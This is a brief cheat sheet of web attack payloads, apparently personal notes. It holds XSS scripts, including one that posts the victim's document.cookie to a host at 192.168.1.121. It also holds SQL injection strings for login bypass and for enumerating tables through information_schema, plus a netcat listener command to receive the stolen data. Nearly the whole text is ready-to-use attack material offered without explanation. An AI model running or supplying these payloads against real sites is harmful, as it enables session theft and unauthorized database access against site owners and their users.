XSS
<script>
	alert('XSS test vulnerabilità');
</script>
<script>
	window.location.href='http://youtube.com'
</script>
<script>
    var xhttp = new XMLHttpRequest();
    xhttp.open("POST", "http://192.168.1.121/", true);
    xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhttp.send("cookies=" + document.cookie);
</script>

SQL
' OR '1'='1
' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema = 'MySQL' --'
 
NETCAT
nc -lvnp 80
